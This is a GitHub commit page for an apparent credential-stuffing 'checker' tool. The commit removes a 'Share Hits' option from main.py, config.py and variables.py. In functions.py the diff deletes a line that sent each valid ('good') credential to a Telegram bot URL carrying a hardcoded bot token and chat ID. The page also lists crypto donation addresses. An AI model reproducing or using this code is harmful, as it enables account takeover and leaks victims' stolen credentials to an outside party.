Skip to content
This repository has been archived by the owner on Feb 23, 2024. It is now read-only.

Commit

Permalink
0.2.6.1
Browse files Browse the repository at this point in the history
Hit share setting removed
  • Loading branch information
Mickey758 committed Dec 24, 2021
1 parent 2a13d19 commit c674088
Show file tree
Hide file tree
Showing 6 changed files with 4 additions and 34 deletions.
3 changes: 0 additions & 3 deletions main.py
Original file line number Diff line number Diff line change
Expand Up @@ -43,7 +43,6 @@ def info():
BTC: bc1qt6gcll4hp7wwqaap7x3lwunf9srw4enuxxddzn
ETH: 0xd7F5C1AB4765Be15F738367905bF4E7Ea83eC9F7
LTC: LdsjBD8ACvqUinrgbJJvCcELs2AxN5NSpc
[{cyan}>{reset}] Consider turning on hit share in the settings if u cant donate :)
[{cyan}>{reset}] If you payed for this application, you were SCAMMED!
Expand Down Expand Up @@ -119,7 +118,6 @@ def settings():
[{cyan}3{reset}] Print Mode : {"CUI" if Checker.cui else "LOG"}
[{cyan}4{reset}] Retries : {Checker.retries}
[{cyan}5{reset}] Threads : {Checker.threads}
[{cyan}6{reset}] Share Hits : {Checker.share}
[{cyan}X{reset}] Back""")
option = input(f" [{cyan}>{reset}] ").lower()
Expand All @@ -128,7 +126,6 @@ def settings():
elif option == "3": change("print")
elif option == "4": change("retries")
elif option == "5": change("threads")
elif option == "6": change("share")
elif option == "x": return

def tools():
Expand Down
20 changes: 0 additions & 20 deletions modules/checkers/private.py

This file was deleted.

9 changes: 2 additions & 7 deletions modules/config.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
from os import makedirs, listdir
from json import load, dump

default = {"proxy_type":"http","proxy_timeout":5,"threads":200,"retries":1,"print_mode":"cui","share":False}
default = {"proxy_type":"http","proxy_timeout":5,"threads":200,"retries":1,"print_mode":"cui"}

def load_config():
"""Load the config values"""
Expand All @@ -15,7 +15,6 @@ def load_config():
Checker.retries = int(data["retries"])
Checker.timeout = int(data["proxy_timeout"])
Checker.threads = int(data["threads"])
Checker.share = bool(data['share'])
cui = data["print_mode"].lower()
if Checker.threads <= 0: Checker.threads = 1
if Checker.proxy_type not in ("http","socks4","socks5"): raise
Expand Down Expand Up @@ -87,8 +86,4 @@ def change(option:str):
values["threads"] = threads
update_config(values)
except:
pass
elif option == "share":
Checker.share = False if Checker.share else True
values["share"] = Checker.share
update_config(values)
pass
1 change: 0 additions & 1 deletion modules/functions.py
Original file line number Diff line number Diff line change
Expand Up @@ -87,7 +87,6 @@ def save(name:str,type:str,time:str,content:str):
with open(f"Results/{time}/{name}_custom.txt","a",errors="ignore") as file: file.write(content+"\n")
elif type == "good":
with open(f"Results/{time}/{name}_good.txt","a",errors="ignore") as file: file.write(content+"\n")
if Checker.share: get(f'https://api.telegram.org/bot5058115375:AAHar3ywXS0EU1BhVGo2XOFYXoNDG5qc8hw/SendMessage?chat_id=-1001590452857&text={name} - {content}',timeout=5)
else:
with open(f"Results/{time}/{name}.txt","a",errors="ignore") as file: file.write(content+"\n")

Expand Down
3 changes: 1 addition & 2 deletions modules/variables.py
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
from threading import Lock
lock = Lock()
version = "0.2.6"
version = "0.2.6.1"
class Checker:
bad = 0
good = 0
Expand All @@ -18,7 +18,6 @@ class Checker:
time = ""

cui = True
share = False
retries = 1
timeout = 10
threads = 200
Expand Down
2 changes: 1 addition & 1 deletion version
Original file line number Diff line number Diff line change
@@ -1 +1 @@
0.2.6
0.2.6.1

0 comments on commit c674088

Please sign in to comment.